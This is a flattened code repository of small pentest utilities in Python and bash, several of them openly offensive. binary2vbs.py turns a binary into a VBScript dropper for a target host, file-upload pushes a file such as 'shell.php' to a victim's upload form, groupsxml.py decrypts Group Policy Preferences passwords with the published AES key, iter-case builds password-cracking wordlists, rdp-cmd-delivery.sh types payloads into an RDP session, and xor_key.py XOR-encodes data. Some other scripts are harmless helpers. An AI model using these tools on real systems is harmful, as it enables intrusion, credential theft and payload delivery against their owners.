├── README.md ├── binary2vbs.py ├── count.py ├── file-upload ├── groupsxml.py ├── ip2binary.py ├── iter-case ├── lhistory ├── myip ├── rdp-cmd-delivery.sh └── xor_key.py /README.md: -------------------------------------------------------------------------------- 1 | # mytools 2 | Some simple and useful tools 3 | 4 | file-upload : multipart form file upload python script (python) 5 | 6 | lhistory: get history command output at n offset (bash) 7 | 8 | myip: get your WAN ip address in command line (bash) 9 | 10 | binary2vbs.py : used to drop binaries to target host via VBScript file 11 | -------------------------------------------------------------------------------- /binary2vbs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #__author__ @nopernik 3 | 4 | import sys 5 | 6 | header = '''Function myWrite(data) 7 | For i = 1 to Len(data) Step 2 8 | myFile.Write Chr(CLng("&H" & Mid(data,i,2))) 9 | Next 10 | End Function 11 | 12 | Dim myArray 13 | 14 | myArray = Array( _''' 15 | 16 | footer = ''' 17 | Dim fObject 18 | Set fObject = CreateObject("Scripting.FileSystemObject") 19 | Dim myFile 20 | Dim fileName 21 | fileName = "binary.bin.js" 22 | Set myFile = fObject.CreateTextFile(fileName, true , false) 23 | 24 | For each i in myArray 25 | myWrite(i) 26 | Next 27 | 28 | myFile.Close 29 | ''' 30 | 31 | if not len(sys.argv[1:]): 32 | print 'Usage: binary2vbs file' 33 | exit() 34 | 35 | f = open(sys.argv[1],'rb') 36 | infile = f.read() 37 | f.close() 38 | 39 | line = infile.encode('hex') 40 | 41 | for i in range(200,300,2): 42 | if len(line) % i != 0: 43 | n = i 44 | break 45 | 46 | print header 47 | 48 | for b in [line[i:i+n] for i in range(0, len(line), n)]: 49 | if not len(b) < n: 50 | print '"%s", _' % b 51 | else: 52 | print '"%s")' % b 53 | 54 | print footer 55 | -------------------------------------------------------------------------------- /count.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys,re 3 | 4 | W = '\033[0m' # white (normal) 5 | G = '\033[32m' # green 6 | 7 | if not len(sys.argv[2:]): 8 | print 'Usage: count.py STRING FILE [--hex] [--print]' 9 | exit(1) 10 | 11 | with open(sys.argv[2],'rb') as fin: 12 | f = fin.read() 13 | 14 | def FindOffsets(target, match): 15 | #print 'Regex find: %r in %r' % (match,target) 16 | return [m.start() for m in re.finditer('(?={})'.format(re.escape(match)), target)] 17 | 18 | prn = False 19 | if '--print' in sys.argv: 20 | prn = True 21 | 22 | hexa = False 23 | if '--hex' in sys.argv: 24 | hexa = True 25 | 26 | if hexa: 27 | match = sys.argv[1].decode('hex') 28 | else: 29 | match = sys.argv[1] 30 | 31 | offsets = FindOffsets(f,match) 32 | for offset in offsets: 33 | out = 'Found' 34 | if prn: 35 | if hexa: 36 | out = f[offset-8:offset].encode('hex')+G+f[offset:offset+len(match)].encode('hex')+W+f[offset+len(match):offset+len(match)+8].encode('hex') 37 | else: 38 | out = f[offset-8:offset]+G+f[offset:offset+len(match)]+W+f[offset+len(match):offset+len(match)+8] 39 | print '0x%08x: %s' % (offset,out) 40 | else: 41 | print '0x%08x' % offset 42 | -------------------------------------------------------------------------------- /file-upload: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import os 3 | import requests 4 | import sys 5 | 6 | # Defaults 7 | content_type = 'application/octet-stream' 8 | upload_file = 'test.php' 9 | upload_content = '' 10 | variable = 'file' 11 | 12 | def usage(fault=0): 13 | 14 | print ''' 15 | Usage: upload.py [-u][-f][--content-type][--variable][--origin] 16 | 17 | -u http://victim.com/upload.php 18 | -f shell.php (this file will be uploaded) 19 | --content-type image/png 20 | --variable myfile (variable of file form parameter) 21 | --origin http://victim.com/index.php 22 | 23 | if -f not specified, it will upload '' to test.php 24 | ''' 25 | if fault: 26 | print 'Error with %s parameter...' % fault 27 | exit() 28 | 29 | if not len(sys.argv[1:]): usage() 30 | 31 | params = sys.argv[1:] 32 | 33 | def opt(v): 34 | return params[params.index(v)+1] 35 | 36 | if '-u' in params: 37 | url = opt('-u') 38 | else: 39 | usage('-u') 40 | 41 | if '-f' in params: 42 | if os.path.isfile(opt('-f')): 43 | f = open(opt('-f'),'rb') 44 | upload_content = f.read() 45 | upload_file = opt('-f') 46 | f.close() 47 | else: 48 | usage('-f') 49 | 50 | if '--content-type' in params: 51 | content_type = opt('--content-type') 52 | 53 | if '--origin' in params: 54 | origin = opt('--origin') 55 | else: 56 | origin = opt('-u') 57 | 58 | if '--variable' in params: 59 | variable = opt('--variable') 60 | 61 | session = requests.Session() 62 | 63 | paramsPost = {"submit":"submit"} 64 | paramsMultipart = [(variable, (upload_file, upload_content, content_type))] 65 | headers = {"Origin":origin,"Cache-Control":"max-age=0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","User-Agent":"Mozilla/5.0 (X11; Linux x86) AppleWebKit/524.12 (KHTML, like Gecko) Chrome/52.0.2963.251 Safari/524.12","Connection":"close","Accept-Encoding":"gzip, deflate","Accept-Language":"en-US,en;q=0.8"} 66 | response = session.post(url, data=paramsPost, files=paramsMultipart, headers=headers) 67 | 68 | print "Status code:", response.status_code 69 | print -------------------------------------------------------------------------------- /groupsxml.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import xmltodict 4 | import sys, os, re, json 5 | from Crypto.Cipher import AES 6 | from base64 import b64decode 7 | from pprint import pprint 8 | 9 | verbose = False 10 | verbose2 = False 11 | if '-v' in sys.argv: 12 | verbose = True 13 | elif '-vv' in sys.argv: 14 | verbose2 = True 15 | 16 | if not len(sys.argv[2:]): 17 | print "Usage: groupsxml.py [-p ][-f Groups.xml][-d path-to-xml-files] [-v|-vv]" 18 | sys.exit(1) 19 | 20 | def decryptPass(cpassword): 21 | # Init the key 22 | # From MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2 23 | key = """ 24 | 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 25 | f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b 26 | """.replace(" ","").replace("\n","").decode('hex') 27 | 28 | # Add padding to the base64 string and decode it 29 | cpassword += "=" * ((4 - len(sys.argv[1]) % 4) % 4) 30 | password = b64decode(cpassword) 31 | 32 | # Decrypt the password 33 | o = AES.new(key, AES.MODE_CBC, "\x00" * 16).decrypt(password) 34 | 35 | return o[:-ord(o[-1])].decode('utf16') 36 | 37 | def parseUser(user): 38 | try: 39 | 40 | keys = [('Username','@userName'),('Password','@cpassword'),('New username','@newName')] 41 | if verbose: keys = [('Username','@userName'),('Password','@cpassword'),('New username','@newName'),('Description','@description'),('Disabled','@acctDisabled'),('No change','@noChange')] 42 | if verbose2: keys = [('Username','@userName'),('Password','@cpassword'),('New username','@newName'),('Action','@action'),('Full Name','@fullName'),('Description','@description'),('Disabled','@acctDisabled'),('Never Expires','@neverExpires'),('No change','@noChange')] 43 | prop = user['Properties'] 44 | if prop['@cpassword']: 45 | #print '\n' 46 | print 'Change date: %s' % user['@changed'] 47 | for label,k in keys: 48 | if k in prop: 49 | print '%s: %s' % (label,decryptPass(prop[k]) if k == '@cpassword' and prop[k] else prop[k]) 50 | print 51 | except: 52 | pass 53 | 54 | 55 | 56 | def parseXml(DATA): 57 | try: 58 | c = json.loads(json.dumps(xmltodict.parse(DATA))) 59 | if 'User' in c['Groups']: 60 | user = c['Groups']['User'] 61 | if isinstance(user,list): 62 | for i in user: 63 | parseUser(i) 64 | elif isinstance(user,dict): 65 | parseUser(user) 66 | else: 67 | print '\nNo passwords found\n' 68 | 69 | except: 70 | print 'Something went wrong...' 71 | print sys.exc_info() 72 | 73 | if '-p' in sys.argv: 74 | pwd = sys.argv[sys.argv.index('-p')+1] 75 | print decryptPass(pwd) 76 | 77 | elif '-f' in sys.argv: 78 | infile = sys.argv[sys.argv.index('-f')+1] 79 | with open(infile) as f: 80 | parseXml(f.read()) 81 | elif '-d' in sys.argv: 82 | for infile in [i for i in os.listdir(sys.argv[sys.argv.index('-d')+1]) if '.xml' in i.lower()]: 83 | with open(infile) as f: 84 | parseXml(f.read()) 85 | 86 | 87 | #print '-'*30 88 | 89 | 90 | -------------------------------------------------------------------------------- /ip2binary.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys 4 | from netaddr import IPAddress as IP 5 | if not len(sys.argv[1:]): 6 | print '\nUsage ip2binary.py 8.8.8.8' 7 | exit() 8 | 9 | 10 | try: 11 | ip = IP(sys.argv[1]) 12 | ip = ip.value 13 | except: 14 | print 'Error with ip value' 15 | exit() 16 | 17 | print 18 | print 'IP:',IP(ip) 19 | print 'Base2:', bin(ip) 20 | print 'Base8:', oct(ip) 21 | print 'Base10', ip 22 | print 'Base16:', hex(ip) 23 | print 24 | -------------------------------------------------------------------------------- /iter-case: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #__author__ Alexander Korznikov 3 | #__date__ 11/11/2015 4 | #__version__ 1.0 5 | 6 | import sys 7 | import itertools 8 | import string 9 | 10 | qu = string.ascii_letters + string.digits + string.punctuation 11 | chars_dict = { 'a':['4','@'],'e':['3'],'l':['1'],'i':['1'],'s':['5','$'],'t':['7'],'b':['8'],'o':['0'],'g':['9'] } 12 | infile = False 13 | l33t = False 14 | 15 | def usage(): 16 | print ''' 17 | \tGenerate whole spectrum of possible cases of p4$sw0rDs: 18 | 19 | \tExamples: 20 | \t 1. -i Pass strings via stdin: 21 | 22 | \t # echo 'foo' | iter-case -i 23 | 24 | \t 2. -p Pass string via argument: 25 | 26 | \t # iter-case -p foo 27 | 28 | \t 3. -f Pass in file argument: 29 | 30 | \t # iter-case -f dict.txt 31 | 32 | \t 4. -l 31337 aka skiddies method: 33 | \t switch between 'e' -> '3' etc.. 34 | 35 | \t # iter-case [-f|-p|-i] -l 36 | 37 | \t// Alexander Korznikov, Ver. 1.0 11/2015 38 | ''' 39 | # print '\n\tUsage: cat dict.txt | iter-case-stdin -i' 40 | # print '\tWill generate wordlist Passw0rd...pASSW0RD\n' 41 | exit() 42 | 43 | def do_magic(iter_list): 44 | for line in iter_list: 45 | out = list(line.strip()) 46 | cnt = 0 47 | for i in out: 48 | if i in chars_dict.keys(): 49 | leet = '' 50 | for c in chars_dict[i.lower()]: 51 | leet += c 52 | else: 53 | leet = '' 54 | 55 | if l33t: 56 | out[cnt] = i + leet 57 | else: 58 | out[cnt] = i + (i.swapcase() if i.isalpha() else i) + leet 59 | cnt+=1 60 | 61 | for i in itertools.product(*out): 62 | print ''.join(i).strip() 63 | if infile: 64 | iter_list.close() 65 | 66 | args = sys.argv[1:] 67 | 68 | if not args or '-h' in args: 69 | usage() 70 | 71 | if '-f' in args: 72 | try: 73 | iter_list = open(args[args.index('-f')+1]) 74 | infile = True 75 | except: 76 | usage() 77 | 78 | elif '-p' in args: 79 | iter_list = [args[args.index('-p')+1]] 80 | 81 | elif '-i' in args: 82 | iter_list = sys.stdin 83 | 84 | else: 85 | usage() 86 | 87 | if '-l' in args: 88 | l33t = True 89 | 90 | # Let's do the magic! ;) 91 | do_magic(iter_list) 92 | 93 | -------------------------------------------------------------------------------- /lhistory: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | offset=$1 4 | 5 | o1=`expr $offset - 20` 6 | o2=`expr $offset + 20` 7 | 8 | sed -n "$o1","$o2"p $HISTFILE 9 | -------------------------------------------------------------------------------- /myip: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # by @nopernik @korznikov.com 4 | # 5 | bldpur='\e[1;35m' 6 | txtblu='\e[0;34m' 7 | bldblu='\e[1;34m' 8 | bldgrn='\e[1;32m' 9 | txtrst='\e[0m' 10 | echo 11 | echo -e "Local:\t" `ip a|grep 'scope global' |grep -v vmnet |grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/[0-9]{1,2}'` 12 | echo 13 | myip=`dig a myip.opendns.com @resolver1.opendns.com +short` 14 | whois $myip | grep -Ei 'inetnum|netrange|cidr|netname|descr|organization|orgname|country' 15 | echo 16 | echo -e "------=| $bldgrn $myip $txtrst |=------" 17 | echo 18 | 19 | -------------------------------------------------------------------------------- /rdp-cmd-delivery.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # by @nopernik 4 | # 5 | # dependency xdotool 6 | 7 | WINDOWNAME=rdesktop 8 | 9 | if [ -z $1 ]; then 10 | echo -e "\nUsage: rdp-cmd-delivery.sh OPTIONS file.ps1\n" 11 | echo -e " OPTIONS:" 12 | echo " --tofile 'c:\test.txt' local.ps1 #will copy contents of local.ps1 to c:\test.txt" 13 | echo " --cmdfile local.bat #will execute everything from local.bat" 14 | echo 15 | echo -e " To deliver powershell payload, use '--cmdfile script.ps1' but inside powershell console\n" 16 | exit 1 17 | fi 18 | 19 | function catFile { 20 | # $1 localfile content 21 | xdotool search --name $WINDOWNAME windowfocus windowactivate type "$1" 22 | xdotool search --name $WINDOWNAME windowfocus windowactivate key Return 23 | } 24 | 25 | function copyCon { 26 | # $1 = filename to create remotely 27 | # $2 = file content 28 | xdotool search --name $WINDOWNAME windowfocus windowactivate type "copy con $1" 29 | xdotool search --name $WINDOWNAME windowfocus windowactivate key Return 30 | xdotool search --name $WINDOWNAME windowfocus windowactivate type "$2" 31 | xdotool search --name $WINDOWNAME windowfocus windowactivate key Ctrl+Z Return 32 | } 33 | 34 | if [ "$1" = "--cmdfile" ]; then 35 | catFile "$(cat $2)" 36 | exit 0 37 | fi 38 | 39 | if [ "$1" = "--tofile" ]; then 40 | if [ ! -z "$3" ];then 41 | copyCon "$2" "$(cat $3)" 42 | fi 43 | exit 0 44 | fi 45 | -------------------------------------------------------------------------------- /xor_key.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys 4 | import string 5 | 6 | outfile = False 7 | hex_out = False 8 | if not len(sys.argv[2:]): 9 | print """Usage:\t xor.py 10 | Input: --rawfile | --hexfile | --string STRING | --inhex 50415353574F5244 11 | Key: --key PASSWORD | --keyhex 50415353574F5244 12 | Output: --hex | --outfile 13 | """ 14 | exit() 15 | if '--string' in sys.argv: 16 | string = sys.argv[sys.argv.index('--string')+1] 17 | elif '--inhex' in sys.argv: 18 | string = sys.argv[sys.argv.index('--inhex')+1].decode('hex') 19 | elif '--rawfile' in sys.argv: 20 | string = open(sys.argv[sys.argv.index('--rawfile')+1],'rb').read() 21 | elif '--hexfile' in sys.argv: 22 | string = open(sys.argv[sys.argv.index('--hexfile')+1],'rb').read().replace('\n','').replace('\r','').replace(' ','').decode('hex') 23 | else: 24 | print 'Missing input parameters...' 25 | exit() 26 | if '--keyhex' in sys.argv[2:]: 27 | key = sys.argv[sys.argv.index('--keyhex')+1].decode('hex') 28 | elif '--key' in sys.argv: 29 | key = sys.argv[sys.argv.index('--key')+1] 30 | else: 31 | print 'Missing xor key...' 32 | exit() 33 | if '--hex' in sys.argv: 34 | hex_out = True 35 | elif '--outfile' in sys.argv: 36 | outfile = sys.argv[sys.argv.index('--outfile')+1] 37 | 38 | #string = '''Burning 'em, if you ain't quick and nimble 39 | #I go crazy when I hear a cymbal''' 40 | 41 | cipher = [] 42 | cnt = 0 43 | for c in string: 44 | cipher.append(chr(ord(c) ^ ord(key[cnt]))) 45 | cnt += 1 46 | if cnt == len(key): 47 | cnt = 0 48 | 49 | enc = ''.join(cipher) 50 | 51 | if hex_out: 52 | print enc.encode('hex') 53 | elif outfile: 54 | with open(outfile,'wb') as f: 55 | f.write(enc) 56 | else: 57 | print enc 58 | --------------------------------------------------------------------------------